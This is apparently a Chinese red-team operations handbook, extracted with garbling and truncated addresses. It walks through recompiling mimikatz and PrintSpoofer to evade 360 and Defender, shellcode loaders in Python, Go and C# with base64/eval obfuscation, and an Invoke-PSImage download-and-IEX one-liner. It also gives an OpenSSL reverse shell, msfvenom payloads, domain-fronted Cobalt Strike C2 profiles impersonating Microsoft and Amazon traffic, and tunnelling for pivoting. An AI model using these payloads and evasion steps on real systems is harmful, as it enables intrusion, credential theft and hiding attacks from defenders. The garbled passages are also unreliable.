2023HW紅隊工作指南手冊

HW紅隊工作指南手冊免殺篇 3免殺WindowsDefender 3白名單繞過Defender查殺 4免殺360安全衛(wèi)士和360殺毒 4mimikatz免殺過360安全衛(wèi)士和360安全殺毒 5PrintSpoofer免殺過360殺毒360安全衛(wèi)士 8MSF用加載器免殺過360安全衛(wèi)士和360安全殺毒 10Python3Cobaltstrikeshellcode免殺過360衛(wèi)士和360殺毒 14Golang加載器Cobaltstrikeshellcode免殺國內主流殺軟 16GolangCobaltstrikeshellcode免殺國內主流殺軟 19c#xor加載器免殺過360安全衛(wèi)士和360安全殺軟 20Cobaltstrike免殺過360和WindowsDefender 24msf加密殼免殺過360安全衛(wèi)士和360安全殺毒 25Cobaltstrike免殺過360和WindowsDefender 26Invoke-PSImage免殺過360殺毒 28MSF免殺360安全衛(wèi)士安全殺毒 30流量加密 31使用Openssl反彈加密shell 31MSF流量加密躲避檢測 33域前置cobaltstrike逃避IDS審計 35域前置技術原理 35工作原理 36域前置實踐 40cobaltstrike域前置配置 42cobaltstrike生成證書修改C2profile流量加密混淆 47生成免費的ssl證書 47創(chuàng)建并修改C2-profile文件 49檢測C2profile文件是否可用 52配置teamserver文件運行上線 53生成后們進去測試 53隧道應用 55端口映射 55端口映射與端口轉發(fā) 55netsh端口映射 55netsh端口轉發(fā)監(jiān)聽metperter 57cobaltstrike多層內網(wǎng)上線 58cobaltstrike正向連接多層內網(wǎng) 58cobaltstrike反向連接多層內網(wǎng) 62端口映射burpsuite抓內網(wǎng)數(shù)據(jù)包 65burpsuite設置上游代理訪問內網(wǎng) 67MetasploitPortfwd（端口轉發(fā)/重定向） 70內網(wǎng)穿透Neo-reGeorg的使用 71SSH隧道轉發(fā)的常見場景 75使用Earthworm(EW)做Socks5代理完成內網(wǎng)穿透 81Tunna搭建HTTP正向代理 83利用ICMP隧道技術進行ICMP封裝穿透防火墻 85DNS隧道穿透防火墻 87frp內網(wǎng)穿透 91網(wǎng)絡釣魚篇 97Office釣魚攻擊 97cobaltstrike生成宏 97創(chuàng)建宏98測試宏文件 100利用DOCX文檔遠程模板注入執(zhí)行宏 101創(chuàng)建dotm文件 101創(chuàng)建遠程模板加載文檔 103執(zhí)行測試 105Excel4.0宏躲避殺軟檢測 106CHM電子書釣魚 109lnk快捷方式釣魚 克隆網(wǎng)站釣魚 假網(wǎng)站釣魚 FLASH網(wǎng)頁釣魚 文件釣魚 利用偽裝文件 120CobaltStrike魚叉釣魚 1215.關注 1236.培訓網(wǎng)站 123道應用篇。免殺篇WindowsDefenderWindowsDefenderwindow10Defender您持續(xù)有效地工作。Defender查殺在win2016/2019繞過WindowsDefender的版本里c-exclusionsDefender并不會查殺這些文件名的進程Processexclusions%SystemRoot%\system32\inetsrv\w3wp.exe%SystemRoot%\SysWOW64\inetsrv\w3wp.exe%SystemDrive%\PHP5433\php-cgi.exemkdirSystemDrive%\PHP5433exeDefendermimikatz為例子，mimikatz已經(jīng)被我做PHP5433php-cgi.exeDefender查殺。360360360360安全中心出品的一款免費的云安全殺毒軟件。它創(chuàng)新性地整BitDefender傘)360360360QVM人工智能引擎。mimikatz360360安全殺毒MimikatzWindows認證(LSASS)NTLM哈希值的工具，攻擊者可以借此漫游內網(wǎng)。也可以通過明文hash值來提權。因為這款工具特別出名所以被查殺的機率很大，githubbypass反病毒軟件。位到字符串上，定位到輸入表上。Mimikatz源代碼下載/gentilkiwi/mimikatzvs2012依賴文件VisualC++MFCforand64https://aka.ms/vs/16/release/vc_redist.x64.exeDesktopdevelopmentwithc++報錯：errorMSB8020，解決方法：項目->屬性->常規(guī)->平臺工作集，將平臺改為VS2012(v110)后即可成功運行編譯。如果出現(xiàn)以下情況kuhl_m_net.c這個文件的注釋去掉即可1>modules\kuhl_m_net.c:errorC2220:警告被視為錯誤-沒有生成“object”文件1>modules\kuhl_m_net.c:warningC4819:該文件包含不能在當前代碼頁(936)中表示的字符。請將該文件保存為Unicode格式以防止數(shù)據(jù)丟失編譯成功選擇releasex64運行的時候360安全衛(wèi)士會進行攔截免殺步驟替換mimikatz關鍵字moonteamsmimikatz下的文件全部改為moonteams資源版本信息去掉把項目里所有的文件注釋去掉/* BenjaminDELPY`gentilkiwi`benjamin@Licence:/licenses/by/4.0/*/刪除提示運行提示更換圖標最終效果PrintSpoofer360360Windows10和WindowsService2016/2019提權工具，現(xiàn)在主流的提供工具之一，360安全會自動查殺，其他殺毒軟件并不會查殺，往后可能更多的防護軟件會對其進行攔截查殺。對其進行源碼免殺，首先下載源碼/whojeff/PrintSpoofer用vs2019選擇releasex64編譯PrintSpoofer.cpp里面的輸出幫助文檔全部清空項目文件搜索PrintSpoofer替換其他這改成moonsecPrintSpoofer.cppPrintSpoofer.h全改為其他名字這里改成moonsec加一個ico圖標最終結果MSF360360metasploitMetasploit是免費的工具，因此安全工作人員常用Metasploit工具來檢測系統(tǒng)的安全性。MetasploitFramework(MSF)2003shellcode編寫和漏洞研究提供了一個可靠平臺。其中攻擊載荷模塊(Payload)，在紅隊中是個香餑餑，使用這個模塊生成的后門，不僅支持多種平臺，而且Metasploit還有編碼器模塊項目地址/rsmudge/metasploit-loader編輯metasploit-loader/master/src/main.c把以下去掉if(argc!=3){printf("%s[host][port]\n",argv[0]);exit(1);}安裝編譯器 sudoapt-getinstallmingw-w64編輯i686-w64-mingw32-gccmain.c-omm.exe-lws2_32設置監(jiān)聽器msf>useexploit/multi/handlermsf exploit(handler)>setwindows/meterpreter/reverse_tcp=>windows/meterpreter/reverse_tcpmsf exploit(handler)>set=>31337msf exploit(handler)>setLHOST80LHOST=>41msf exploit(handler)>exploit-j64位免殺編譯免殺工具Dev-Cpp5.11TDM-GCC4.9.2Setup下載地址/projects/orwelldevcpp/文件->新建項目->consoleApplication->c項目修改文件把winsock2.h移動到windows.h上不然編譯會出錯。這四處的數(shù)字做一些更改編譯設置加上-static-libgcc-lws2_32按F9編譯完成設置metasploit的監(jiān)聽器setpayloadwindows/x64/meterpreter/reverse_tcp正常上線可以過掉國內大多數(shù)的殺毒軟件。Python3Cobaltstrikeshellcode免殺過360Python2.7現(xiàn)在很多殺毒軟件都會查殺免殺效果有點差?？梢允褂胮ython3來做shellcode的免殺處理。Python3下載下載最新的版本當前實驗的版本是Python3.8.664位pyinstaller4.0/downloads/pipinstallpyinstallerPython3shellcode加載代碼importctypes#shellcode加載defshellCodeLoad(shellcode):ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))buf=(ctypes.c_char*len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))handle=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))ifname =="main":編譯pyinstaller-Ftest.py--noconsole有時候殺毒軟件會查殺這一段代碼ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))可以使用編碼進行處理再eval動態(tài)執(zhí)行代碼eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))Python3shellcode加載代碼importctypesimportbase64#shellcode加載defshellCodeLoad(shellcode):ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))buf=(ctypes.c_char*len(shellcode)).from_buffer(shellcode)eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))handle=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))ifname =="main":GolangCobaltstrikeshellcodeGo語言目前是最火的編程語言之一，使用go語言編寫的加載器，運行shellcode可以過國內主流殺軟，例如360安全衛(wèi)士、360安全殺毒、火絨、瑞星、金山、電腦管家。免殺效果很好。而且操作免殺的步驟簡單。項目地址/jax777/shellcode-launchGo語言編譯器下載/dl這里選擇Cobaltstrike選擇c代碼shellcodeshellcode-launchcopywindows下winlaunch.goshellcodepackagemainimport("shellcode-launch/winshellcode")funcmain(){sc:=[]byte("你的shellcode")winshellcode.Run(sc)}32位運行setCGO_ENABLED=0setGOOS=windowssetGOARCH=386gobuild-ldflags="-s-w"winlaunch.go64位運行win_64.batsetCGO_ENABLED=0setGOOS=windowssetGOARCH=amd64gobuild-ldflags="-s-w"winlaunch.go已經(jīng)可以過360安全殺毒世界殺毒網(wǎng)只有五款殺毒軟件報毒V只有兩款報毒運行GolangCobaltstrikeshellcode這個也是golangshellcode加載器也可以免殺國內的主流殺軟項目地址/vyrus001/shellGomain.go這個部分就是運行計算器的shellcode打開cobaltstrike->payloadGenerator-選擇C#替換計算器的shellcode編譯gobuildmain.go世界殺毒網(wǎng)只有五款防護軟件報毒效果還是是不錯的。cxor360360c#文件特別的小，可以很好的投遞傳輸。項目地址/antman1p/ShellCodeRunner用vs2019打開sln項目文件xorkryptorcobaltstrikeraw二進制文件ShellCodeRunner.exepayload.binencrypt.bin就是經(jīng)過編碼后的文件。Rsources和encrypt.bin文件事實上項目是沒有這個文件夾和文件所以再當前目錄新建文件夾和將生成好的shellcode文件encrypt.bin復制到文件夾里。右鍵選擇編譯文件即可。這就是生成好的后門。已經(jīng)可以完全過掉360運行正常VVTCobaltstrike360WindowsDefenderAdvancedAVEvasion是紅隊的shellcode免殺加載器能免殺360和微軟Defender防護軟件生成正常上線可以過windowsdefendermsf360360項目地址/bats3c/darkarmour安裝依賴文件sudoaptinstallmingw-w64-toolsmingw-w64-commong++-mingw-w64gcc-mingw-w64upx-uclosslsigncodeMsf生成后門msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=80LPORT=4444-fexe-oexploit.exe執(zhí)行命令./darkarmour.py-fexploit.exe--encryptxor--jmp-oe.exe--loop5Cobaltstrike360WindowsDefender這次帶來的時gogo現(xiàn)在還是有很多殺軟還是可以過的。今天用到的攻擊下載地址/diljith369/avbypassGo#simple-antivirus-bypass-technique原理利用go里面的cmd執(zhí)行遠程下載powershell后門這個部分修改成你的cs后門編譯文件gobuildbypassav.go360會有攔截放行后可上線WindowsDefender無任何提示可以上線Invoke-PSImage360Invoke-PSImagePowerShellPNG傳遞-Web行它們。它會利用圖片中每個像素點最后42個顏色值來存儲PayloadPNGPayloadPayloadPNG的。據(jù)大小來選擇圖片（盡可能多的像素點）。例如，Invoke-MimikatzInvoke-PSImage/peewpw/Invoke-PSImagecspowershellshellcodeSet-ExecutionPolicyUnrestricted-ScopeCurrentUserImport-Module.\Invoke-PSimage.ps1轉換圖片Invoke-PSImage-Script.\payload.ps1-Image.\test.jpg-Out.\test2.png-Web生成執(zhí)行代碼salaNew-Object;Add-Type-AssemblyName"System.Drawing";$g=aSystem.Drawing.Bitmap((aNet.WebClient).OpenRead("/evil.png"));$o=aByte[]3840;(0..1)|%{foreach($xin(0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3534]))/evil.png替換生成的圖片下載鏈接在目標上執(zhí)行salaNew-Object;Add-Type-AssemblyName"System.Drawing";$g=aSystem.Drawing.Bitmap((aNet.WebClient).OpenRead("27:80/test2.jpg"));$o=aByte[]3840;(0..1)|%{foreach($xin(0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3534]))最終效果360安全衛(wèi)士360殺毒軟件沒任何提示W(wǎng)indowsDefender會查殺MSF360metasploitMetasploit因此安全工作人員常用Metasploit工具來檢測系統(tǒng)的安全性。MetasploitFramework(MSF)2003shellcode編寫和漏洞研究提供了一個可靠平臺。其中攻擊載荷模塊(Payload)，在紅隊中是個香餑餑，使用這個模塊生成的后門，不僅支持多種平臺，而且Metasploit還有編編碼器模塊msf自帶的編碼器和免殺模板都是很難繞過360全套殺毒軟件Cooolis免殺過360全套，這是國人的一個項目，可以過掉360全套。下面我來介紹這個項目，項目的地址/Rvn0xsy/Cooolis-ms/加載器執(zhí)行流程：Cooolis-ServerCooolis-ServerMetasploitRPC服務端Payloaddockergitclone/Rvn0xsy/Cooolis-ms.gitcdCooolis-ms/Dockerdocker-composeup-d啟動MetasploitRPC服務器msfrpcd-Umsf-Pmsf-u/api/1.0/-a配置Metasploit監(jiān)聽器msf5>useexploit/multi/handlermsf5>setpayloadwindows/meterpreter/reverse_tcpmsf5>setLHOST1msf5>setLPORT8876msf5>exploit-j啟動Cooolis-ms客戶端Cooolis-ms.exe-pwindows/meterpreter/reverse_tcp-oLHOST=1,LPORT=8876,Format=dll-H1-P8899流量加密OpensslshellshellshellIDS止。使用wireshark抓包直接看到輸入的命令和返回的信息這些危險命令會被防火墻或者ips檢測。所以要對這些信息進行混淆或加密。泛被應用在互聯(lián)網(wǎng)的網(wǎng)頁服務器上。在kali上使用OpenSSL生成自簽名證書opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes在kali上監(jiān)聽端口openssls_server-quiet-keykey.pem-certcert.pem-port8080在目標上執(zhí)行反彈shell命令mkfifo/tmp/s;/bin/sh-i</tmp/s2>&1|openssls_client-quiet-connect29:8080>/tmp/s;rm/tmp/s流量已經(jīng)經(jīng)加密MSFmetasploitOpenSSL創(chuàng)建SSL/TLS證書opensslreq-new-newkeyrsa:4096-days365-nodes-x509\-subj"/C=UK/ST=London/L=London/O=Development/CN="\-keyout.key\-out.crt&&\cat.key.crt>.pem&&\rm-f.key.crt生成后門msfvenom-pwindows/meterpreter/reverse_winhttpsLHOST=17LPORT=443PayloadUUIDTracking=trueHandlerSSLCert=.pemStagerVerifySSLCert=truePayloadUUIDName=ParanoidStagedPSH-fpsh-cmd-opentestlab.bat設置監(jiān)聽器配置偵聽器時還需要使用兩個附加選項。這是為了通知處理程序它將使用的證書（與有效負載相同），并在接收到連接時執(zhí)行SSL證書驗證。HandlerSSLCertStagerVerifySSLCertsetpayloadwindows/meterpreter/reverse_winhttpssetLHOST49setLPORT443setHandlerSSLCert/home/kali/msf/.pemsetStagerVerifySSLCerttrueexploit抓包數(shù)據(jù)包已經(jīng)加密從有效負載將在目標主機上執(zhí)行的那一刻起，一個加密的MeterMeter會話將打開，它將不允許主機入侵防御系統(tǒng)檢查數(shù)據(jù)包并斷開連接。域前置cobaltstrikeIDS域前置（DomainFronting）HTTPS通用規(guī)避技術，也被稱為域前端網(wǎng)MtsploitCobltStike等團隊控制服務器流量，Amazon,Google，Akamai等大型廠商會提供一些域前端技術服務。域前置技術原理CDNC2CDNipHost頭進行流量轉發(fā)，利用我們配置域名的高可信度，如我們可以設置DLP，agent等流量監(jiān)測。原理以下工作原理域前置的的核心是cdncdn是的工作原理是：IP可以被不同的域名進行綁定然而進行網(wǎng)站加速，例如現(xiàn)在有兩個網(wǎng)站分別為和都指定同一個IP23這個ip上是cdn的時候怎么保證HTTPhost頭加入訪問的域名。演示18是一個cdn服務器這個服務器上轉發(fā)多個域名都是這個cdn服務器上的域名而且這兩個域名都綁定了別名進行cdn加速curlhttphost如圖在curl里面指定CDN的IP指定host為上面兩種放法都可以訪問域名里的內容。同一個cdn訪問不同的網(wǎng)址在host加上你要訪問的域名請求頭，cdn就可以知道你與哪個域名進行通信，就會得到指向網(wǎng)頁的內容。cdnip18所以我們也可以這樣訪問如圖在wget里把ip替換成域名因為也是指向cdn服務器所以訪問的也是正常內容。域前置基礎就是基于這個原理，所以我們可以申請一批高信譽的域如接近microsoft類似這類域名，然后在請求頭里加上cdncdnIPC2ip也會被自動隱藏。域前置實踐環(huán)境cobaltstrike4.0外網(wǎng)kali在某云、某鵝、Amazon購買cdn云加速服務。注意在國內使用cdn云加速都需要域名進行備案，如你使用某云的必須去申請或者購買已備案的域名。這里以某云做一個域前置例子首先準備一個已經(jīng)在某云備案好的域名在cdn服務選擇全站加速/overview提交準備好的域名審核通過后某云會提示你進行下一步操作。指定你c2服務器的真實ip設置完成后把的CNAME域名里進行CAME綁定設置完成后過一段時間就會生效。在超級ping測試cdn的ip是否正常大部分已經(jīng)生效了。接下來就是配置cobaltstrikecobalt域前置配置C2profile/xx0hcd/Malleable-C2-Profiles選擇合適的profile文件修改host頭為我們的準備好的域名##Amazonbrowsingtrafficprofile##Author:#setsleeptime"5000";setjitter "0";setmaxdns "255";setuseragent"Mozilla/5.0(WindowsNT6.1;WOW64;Trident/7.0;rv:11.0)likeGecko";http-get{seturi"/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";client{header"Accept""*/*";header"Host""www.mazibao.vip";metadata{base64;prepend"session-token=";prepend"skin=noskin;";append"csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996";header"Cookie";}}server{header"Server""Server";header"x-amz-id-1""THKUYEZKCKPGY5T42PZT";header "x-amz-id-2""a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";header"X-Frame-Options""SAMEORIGIN";header"Content-Encoding""gzip";output{print;}}}http-post{seturi"/N4215/adj/amzn.us.sr.aps";client{header"Accept""*/*";header"Content-Type""text/xml";header"X-Requested-With""XMLHttpRequest";header"Host""www.mazibao.vip";parameter"sz""160x600";parameter"oe""oe=ISO-8859-1;";id}

parameter"sn";parameter"s""3717";output{base64;print;}}server{header"Server""Server";header"x-amz-id-1""THK9YEZJCKPGY5T42OZT";header "x-amz-id-2""a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";header"X-Frame-Options""SAMEORIGIN";header"x-ua-compatible""IE=edge";output{print;}}}在kali上運行teamserver加上配置文件sudonohub./teamserver16xxxxxa222filenohub加在一個命令的最前面，表示不掛斷的運行命令不然shell斷了cs也會連接不上。以上運行沒有出錯的情況下配置監(jiān)聽器選擇payloadbeaconhttpshttpshsots是某云cdn的ip生成后門進行測試這個代碼生成后，可以放在其他服務上千萬不要放在c2上不然真是的ip就被查出來了。運行木馬上線正常，功能正常。再用Wireshark進行抓包走cdn節(jié)點流量進行也加密了C2服務器的ip也隱藏了。cobaltstrikeC2profilecobaltstrikeAPT方面近幾年應用范圍很ids入侵新制定。C2profile實際上就是對流量加密傳輸，目的逃逸流量安全審計，穿透檢測器。本次實驗環(huán)境kalicobaltstrike4.0ssl證書cobaltstrikecobaltstrike.storecobaltstrike會被檢測。下面是生成證書的一些命令。keytool-genkey-aliasmoonsec-keyalgRSA-validity36500-keystoremoonsec.storemoonsecmoonsec.store這兩個字符串都要記住因為修改profile要使用填寫相關的地區(qū)信息這些信息填寫后在profile上還要使用請勿亂填，填寫了要保存。完成上面得命令后提示你要輸入得密碼！輸入密碼moon123后提示地區(qū)信息按照提示一步一步填寫。US MicrosoftUpdates最輸入y即可生成證書文件。證書文件已經(jīng)生成好。C2-profile文件setsample_name"moonsecPOSMalware";setsleeptime"5000";#usea~30sdelaybetweencallbackssetjitter "10"; #throwina10%jittersetuseragent"Mozilla/5.0(WindowsNT6.1;rv:24.0)Gecko/20100101Firefox/24.0";#設置證書https-certificate{setCN "US";setO "MicrosoftUpdates";setC "en";setL "US";setOU "MicrosoftUpdates";setST setvalidity"365";}#設置code-signer{setkeystore"moonsec.store";setpassword"moon123";setalias"moonsec";}#指定DNSbeacon不用的時候指定到IP地址setdns_idle"";#每個單獨DNS請求前強制睡眠時間setdns_sleep"0";#通過DNS上載數(shù)據(jù)時主機名的最大長度setmaxdns "235";http-post{seturi"/windebug/updcheck.php/aircanada/dark.php/aero2/fly.php/windowsxp/updcheck.php/hello/flash.php";client{header"Accept""text/plain";header"Accept-Language""en-us";header"Accept-Encoding""text/plain";header"Content-Type""application/x-www-form-urlencoded";id}

netbios;parameter"id";output{base64;prepend"&op=1&id=vxeykS&ui=Josh@PC&wv=11&gr=backoff&bv=1.55&data=";print;}}server{output{print;}}}http-get{seturi"/updates";client{metadata{netbiosu;prepend"user=";header}}server{header"Content-Type""text/plain";output{base64;print;}}}注意設置這個兩個地方#設置證書https-certificate{setCN "US";setO "MicrosoftUpdates";setC "en";setL "US";setOU "MicrosoftUpdates";setST setvalidity"365";}#設置code-signer{setkeystore"moon.store";setpassword"moon123";setalias"moon";}檢測C2profile文件是否可用./c2lintfile運行正常失敗得是會出線紅色。配置teamserver文件運行上線teamserver默認端口是50050修改端口被檢測出來。運行teamservernohup./teamserver35 123456file&放在后臺運行避免shell關閉teamserver也關閉生成后們進去測試監(jiān)聽器選擇payloadhttps設置端口443訪問https的時候證書已經(jīng)生效而且操作并不會被查殺。上線運行正常wireshark抓取流量分析https流量已經(jīng)加密。隧道應用端口映射是指將一臺主機的內網(wǎng)（LAN）IP地址映射成一個公網(wǎng)IP地址機器的多個端口映射到內網(wǎng)不同機器上的不同端口。端口映射與端口轉發(fā)射轉發(fā)只能實現(xiàn)外網(wǎng)到內網(wǎng)的單向通信。netsh端口映射netshwindows工具可以內置中端口轉發(fā)功能。以下是一個常見的場景b7777WEBkalib服務器的7777端口上的內容因為不在同一個網(wǎng)段kali不能直接訪問BB服務器不能直接出網(wǎng)。windowsnetshinterfaceportproxy可以通過這個小A服務器設置端口轉發(fā)。1設置轉發(fā)netshinterfaceportproxyaddv4tov4listenport=設置的端口connectaddress=B服務器(ip)connectport=端口netshinterfaceportproxyaddv4tov4listenport=7777connectaddress=55connectport=77772.訪問42:7777即可獲取B服務器上的端口內容3.其他說明清除規(guī)則指定規(guī)則netshinterfaceportproxydeletev4tov4listenport=7777查看轉發(fā)規(guī)則netshinterfaceportproxyshowall清除s所有規(guī)則規(guī)則netshinterfaceportproxyreset4不能訪問可以在A服務器有有防火墻對7777端口過濾netsh端口轉發(fā)監(jiān)聽metperter在服務器A上可以通過設置代理訪問B服務器.如果拿到b服務器的權限通常是生成正向的后門，然后kalimsf可以正向連接B服務器，由此得到metperterBmsfAAkalimsf上。msf生成后門msfvenom-pwindows/meterpreter/reverse_tcplhost=53lport=4455-fexeA服務器上增加命令將端口4455轉發(fā)到kali上的4455端口上netshinterfaceportproxyaddv4tov4listenport=4455connectaddress=35connectport=4455kali上設置監(jiān)聽usewindows/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetlhost35setlport4445bmetpertercobaltstrikecobaltstrike簡稱csAPT長期是以攻擊企業(yè)內網(wǎng)為主，所以考慮到內網(wǎng)穿透。內網(wǎng)穿透方式，分為正向和反向，正向是可以直連內網(wǎng)teamserverBA有權csBcobalt正向連接多層內網(wǎng)首先A服務上已經(jīng)有了csABteamserverA作為作為跳板可以訪問B。1.生成監(jiān)聽器選擇windowsexecutable(s)填寫名字和要連接的端口生成的后門在B服務器上執(zhí)行cs42interact進入beacon用命令連接上B服務器connect5512345最后正向連接上B服務器cobalt反向連接多層內網(wǎng)B服務器上有防火墻進行攔截，那么cobaltstrike的反向連接。反向連接可以突破防火墻的攔截，因為是從服務器內部反向連接出站。以下是一個存在防火墻的反向連接teamserver的圖AB怎么解決？可以用反向連接突破。listernerhostport保存即可創(chuàng)建后門選擇帶有s的選項在listener選擇剛剛創(chuàng)建的監(jiān)聽器。B服務器執(zhí)行后門bA4.B服務器得會話端口映射burpsuite抓內網(wǎng)數(shù)據(jù)包這里存在兩個網(wǎng)段AC不能直接互通A如果想直接訪問C80端口用burpsuiteBABBC80ABCnetsh是windows自帶的工具可以好輕易的設置端口映射netshinterfaceportproxyaddv4tov4listenport=設置的端口connectaddress=C服務器(ip)connectport=端口在B上執(zhí)行命令設置好規(guī)則netshinterfaceportproxyaddv4tov4listenport=7777connectaddress=55connectport=80用瀏覽訪問B服務器的7777端口即可獲取C服務器上80端口的內容用burpsuite抓包即可burpsuite設置上游代理訪問內網(wǎng)msf入到內網(wǎng)再做橫向滲透或其他操作。kaliBmeterpertersocks4代理通過在A服務proxychainsDC80端口。DC的時候實際上是DA1080端口C80burpsuite無法再使用瀏覽bursuiteburpsuite代Aburpsuitesocks4burpsuitekaliB服務器C80端口整個流程如圖kalimsfsock4aproxychains1080那就可proxychainsnmapc80SocksCap設置socks4a代理那么就可以用sockscap代理訪問C的80端口SocksCap啟用系統(tǒng)代理默認的端口是25378在burpsuite設置上游代理選項卡user_options打開瀏覽器訪問c的80端口開啟burpsuite進行攔截，即可獲取包MetasploitPortfwd（端口轉發(fā)/重定向）Meterpretershellportfwd（或系統(tǒng)的受損主機上運行此命TCP連接，從而使其成為一個支點。就像使sshpotdCPmeterpreter>portfwd-hUsage:portfwd[-h][add|delete|list|flush][args]OPTIONS:-Lopt> 要監(jiān)聽的本地主機（可選）。-h 幫助橫幅。-lopt> 要監(jiān)聽的本地端口。-popt> 要連接的遠程端口-ropt> 要連接的遠程主機portfwdadd–l3389–p3389–r42B3389A3389kailA3389B3389rdesktop:3389Neo-reGeorgAB80端口獲取一個系統(tǒng)權限，C數(shù)據(jù)庫服務器BBAC的CreGeorgreGeorg/L-codes/Neo-reGeorg使用方法輸入密碼生成加密腳本python3neoreg.pygenerate-kmoonsecmoonsec是生成的密碼生成的腳本是免殺的把生成的腳本上傳到b服務器上，b服務器支持aspx在A執(zhí)行命令python3neoreg.py-kmoonsec-u42/tunnel.aspx設置獲取火狐代理1080訪問55如有用nmap掃描C的端口還可以設置proxychains修改/etc/proxychains.conf增加socks51080Proxychainsnmap-sT-Pn55-p80SSHSSHSSH客戶端與服務端之間的網(wǎng)絡數(shù)據(jù)。但是，SSHTCPSSH鏈接來轉發(fā)，并且自動提供TCPSMTP，LDAPTCP應用均能夠從中得益，避免了用戶名，密碼以及隱私SSHTCPSSH進行通訊。SSH端口轉發(fā)的兩大功能加密SSHClient端至SSHServer端之間的通訊數(shù)據(jù)。突破防火墻的限制，完成一些之前無法建立的TCP連接。SSH本地socks5代理ssh-qTfnN-D7070root@54-C-f參數(shù)，把ssh放到后臺運行。瀏覽器設置socks5代理即可訪問外網(wǎng)如谷歌SSH本地轉發(fā)正向連接命令：-Llocalport:remotehost:remotehostportsshserver說明:localport 本機開啟的端口號remotehost IP地址remotehostport 轉發(fā)機器的端口號sshserver IP地址選項：-f后臺啟用-Nshell，處于等待狀態(tài)（不加-N則直接登錄進去）-g應用場景一某企業(yè)要求A訪問內部網(wǎng)絡的C服務器的80端口A與b能互通，B與C能互通，A與C不能通信。C不能出網(wǎng)。ABC80WEBsshipAbC。方法在A服務器上執(zhí)行sshL本地端口:IP:moonsec@39ssh-L6666:55:80moonsec@39-fN常見環(huán)境應用二把目標的端口轉發(fā)出來例如mysql服務器只允許本地訪問在外部不能訪問。這就很好地保護了mysql免受外部攻擊。ssh-L3306:localhost:3306moonsec@39-fN轉發(fā)后Navicat訪問本地3306端口提示連接成功ssh遠程轉發(fā)命令：-Rsshserverport:remotehost:remotehostportsshserver說明：sshserverport 被轉發(fā)機器開啟的端口號remotehost IP地址remotehostport 被轉發(fā)機器的端口號sshserver IP地址好用。以下是一個很經(jīng)典的案例。A可以與B互通B與C可以互相A與C不能通信。AC80BBC330680端口通過。這就用到SSH隧道遠程轉發(fā)首先修改/etc/ssh/sshd_configGatewayPortsyes如果沒有請增加如果請把no修改yes這個配置的作用是遠程轉發(fā)后將改為A通過指定端口就能訪問C遠程轉發(fā)命令在C服務器上執(zhí)行ssh-R本地端口:遠程ip:遠程端口ssh服務器ssh-R8877:57:80moosec@47或者ssh-R8877:57:80moosec@47-fN前者是可以登錄可以操作shell看需求選擇合適的A訪問B的8877端口即可訪問C的80端口Earthworm(EWSocks5EW是一套便攜式的網(wǎng)絡穿透工具，具有SOCKSv5服務架設和端口轉發(fā)兩大核心功能，可在復雜網(wǎng)絡環(huán)境下完成網(wǎng)絡穿透。達網(wǎng)絡深處。目前該工具永久停止更新。工具支持多個平臺工具的穿透模式分為正向代理和反向代理a與b互通b與c互通a與c不互通a獲取b的權限后在b設置代理訪問C的80端口那么A就能訪問C在b里執(zhí)行ew_for_Win.exe-sssocksd-l8888然后設置/etc/proxychains.conf增加socks5398080ew反向代理反向代理的好處是突破防火墻從內部連接外部在b上執(zhí)行ew_for_linux64-srcsocks-l1080-e1024在c上執(zhí)行ew_for_Win.exe-srssocks-d53-e1024在/etc/proxychins.conf增加socks5391080用nmap測試5080端口proxychinsnmap-Pn-sT55-p80TunnaHTTPTunna可以封裝和隧道化HTTP上的任何TCP通信。它可以用來繞過防火墻環(huán)境中的網(wǎng)絡限制。使用pythonproxy.py-u-l[options]選項--help,-h顯示幫助消息并退出。--url=URL,-uURL遠程webshell--lport=LOCAL_PORT,-lLOCAL_PORT本地監(jiān)聽端口--verbose,-v輸出數(shù)據(jù)包大小--buffer=BUFFERSIZE,-bBUFFERSIZE*HTTP請求大小(一些webshels對大小有限制)沒有SOCKS代理的選擇，如果使用SOCKS代理，則忽略此選項--no-socks,-n